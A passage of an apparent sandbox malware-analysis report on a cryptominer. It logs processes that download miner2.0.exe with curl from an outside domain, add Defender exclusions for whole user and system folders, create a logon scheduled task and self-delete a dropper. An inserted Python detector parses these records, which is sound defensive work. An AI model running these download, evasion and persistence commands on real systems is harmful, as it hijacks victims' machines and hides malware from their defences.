                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:80
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:81
Start time:11:42:31
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:82
Start time:11:42:31
Start date:27/09/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Imagebase:0x7ff646080000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:83
Start time:11:42:32
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:84
Start time:11:42:32
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:85
Start time:11:42:32
Start date:27/09/2024
Path:C:\Users\user\AppData\Local\Temp\miner2.0.exe
Wow64 process (32bit):false
Commandline:miner2.0.exe
Imagebase:0x20000
File size:45'056 bytes
MD5 hash:651396CF297F15A1F92EE0A29E27C4EA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000055.00000002.2682783373.000000000345A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:86
Start time:11:42:33
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:87
Start time:11:42:33
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:88
Start time:11:42:33
Start date:27/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:89
Start time:11:42:34
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:90
Start time:11:42:33
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:91
Start time:11:42:34
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:92
Start time:11:42:34
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:93
Start time:11:42:35
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:94
Start time:11:42:35
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:95
                                                                                                                                                                Start time:11:42:35
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:96
                                                                                                                                                                Start time:11:42:35
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:98
                                                                                                                                                                Start time:11:42:36
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:99
                                                                                                                                                                Start time:11:42:36
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:100
                                                                                                                                                                Start time:11:42:36
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:101
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:102
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:103
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:104
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:105
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:106
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

Target ID:107
Start time:11:42:38
Start date:27/09/2024
Path:C:\Users\user\AppData\Local\Temp\svchost64.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Imagebase:0x10000
File size:38'400 bytes
MD5 hash:A8638A5105C9A663B0D6918D64B3AD21
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 0000006B.00000000.2677511483.0000000000012000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
• Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: C:\Users\user\AppData\Local\Temp\svchost64.exe, Author: Joe Security
Has exited:true

Target ID:108
Start time:11:42:38
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:109
Start time:11:42:38
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:110
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:111
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:112
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:113
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:114
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\services64.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\services64.exe
Imagebase:0xa80000
File size:45'056 bytes
MD5 hash:651396CF297F15A1F92EE0A29E27C4EA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:115
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:116
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:117
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:118
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:119
Start time:11:42:39
Start date:27/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:120
Start time:11:42:40
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                Target ID:121
                                                                                                                                                                Start time:11:42:40
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:122
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\services64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x420000
                                                                                                                                                                File size:45'056 bytes
                                                                                                                                                                MD5 hash:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:123
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:124
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true
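
Three things in the records above are what a responder would pull out of this process list: the cmd chain in Target ID 124 that adds four Defender exclusions (%UserProfile%, %AppData%, %Temp%, %SystemRoot%), the delayed self-delete in Target ID 123 (choice as a 3-second sleep, then Del of the dropped svchost64.exe in %Temp%), and the Yara hit on services64.exe in Target ID 122. The Python below is an added example, not part of the Joe Sandbox report and not code from Joe Security or from the malware: it parses records in this report's key:value layout and applies those three checks. The regexes, the extra hypothetical record 900 (the -EncodedCommand variant of the same cmdlet, which the "Base64 Encoded MpPreference Cmdlet" Sigma rule in the report's signature summary refers to) and the handling of -ec/-enc prefixes are assumptions made for illustration.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Union

Record = Dict[str, Union[str, List[str]]]

# Constructed excerpt in the "Target ID" record layout this report uses: one
# "key:value" line per field, "•" bullet lines continuing the previous key,
# blank lines separating processes. Command lines for 122-128 are copied from
# the report; fields the checks do not need are left out.
SAMPLE_RECORDS = r"""
Target ID:122
Path:C:\Windows\System32\services64.exe
Commandline:"C:\Windows\system32\services64.exe"
Yara matches:
• Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:123
Path:C:\Windows\System32\cmd.exe
Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Has exited:true

Target ID:124
Path:C:\Windows\System32\cmd.exe
Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Has exited:true

Target ID:128
Path:C:\Windows\System32\choice.exe
Commandline:choice /C Y /N /D Y /T 3
Has exited:true
"""

# Hypothetical record 900 (NOT in the report): the same cmdlet hidden behind
# -EncodedCommand, which PowerShell expects as base64 of UTF-16LE text.
_ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\ProgramData'".encode("utf-16le")).decode()
SAMPLE_RECORDS += f"""
Target ID:900
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:powershell -nop -w hidden -enc {_ENCODED}
Has exited:true
"""

# Heuristics (assumed patterns, not Joe Sandbox or Sigma logic).
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b[^&]*?-Exclusion(?:Path|Process|Extension)\s+'?([^'\s&]+)'?", re.I)
SELF_DELETE_RE = re.compile(
    r"\b(?:choice|timeout|ping)\b[^&]*&\s*del\s+\"?([^\"&]+)\"?", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def parse_records(text: str) -> List[Record]:
    """Split the dump into one dict per process; bullet lines are appended to a
    list stored under the preceding key (e.g. "Yara matches")."""
    records: List[Record] = []
    current: Record = {}
    last_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
            current, last_key = {}, None
            continue
        if line.startswith("•") and last_key is not None:
            bucket = current.setdefault(last_key, [])
            if isinstance(bucket, list):
                bucket.append(line.lstrip("• ").strip())
            continue
        key, sep, value = line.partition(":")   # first colon only: values hold C:\ paths
        if sep:
            key, value = key.strip(), value.strip()
            current[key] = [] if value == "" else value
            last_key = key
    if current:
        records.append(current)
    return records


def command_views(cmdline: str) -> List[str]:
    """The command line as written plus any decoded -EncodedCommand payload."""
    views = [cmdline]
    for blob in ENCODED_RE.findall(cmdline):
        try:
            views.append(base64.b64decode(blob).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            pass
    return views


@dataclass
class Finding:
    target_id: str
    kind: str      # "defender-exclusion" | "self-delete" | "yara"
    detail: str


def analyse(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for rec in parse_records(text):
        tid = str(rec.get("Target ID", "?"))
        for view in command_views(str(rec.get("Commandline", ""))):
            for path in EXCLUSION_RE.findall(view):
                findings.append(Finding(tid, "defender-exclusion", path))
            m = SELF_DELETE_RE.search(view)
            if m:
                findings.append(Finding(tid, "self-delete", m.group(1)))
        hits = rec.get("Yara matches", [])
        for hit in hits if isinstance(hits, list) else []:
            m = re.search(r"Rule:\s*([^,\s]+)", hit)
            findings.append(Finding(tid, "yara", m.group(1) if m else hit))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_RECORDS):
        print(f"target {f.target_id:>4}  {f.kind:<19} {f.detail}")
```

Add-MpPreference on its own is ordinary administration; the signal here is the shape of the chain (four calls from cmd, each excluding a whole profile or system root) and what it covers: with %SystemRoot% and %Temp% excluded, both the dropped services64.exe in C:\Windows\System32 and the svchost64.exe that record 123 deletes from %Temp% fall outside scanning. On a live host the same roots can be checked with Get-MpPreference and its ExclusionPath property, and removed with Remove-MpPreference.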

                                                                                                                                                                Target ID:125
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:126
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
